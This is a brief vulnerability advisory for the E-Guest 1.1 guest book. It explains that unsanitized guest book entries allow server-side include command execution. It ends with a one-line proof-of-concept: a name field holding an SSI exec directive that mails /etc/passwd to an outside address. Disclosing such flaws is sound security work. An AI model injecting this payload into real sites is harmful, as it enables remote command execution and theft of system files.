E-Guest 1.1 - Server Side Include Arbitrary Command Execution

source: https://www.securityfocus.com/bid/5129/info

E-Guest guest book is a freely available, open source guest book. It is designed for Unix and Linux operating systems.

E-Guest does not adequately sanitize user-supplied input in guest book entries. Because of this, it is possible to pass along commands via server-side includes that could allow a remote user to execute commands on the local host.

Full Name: HI<!--#exec cmd="/bin/mail [email protected] < /etc/passwd"-->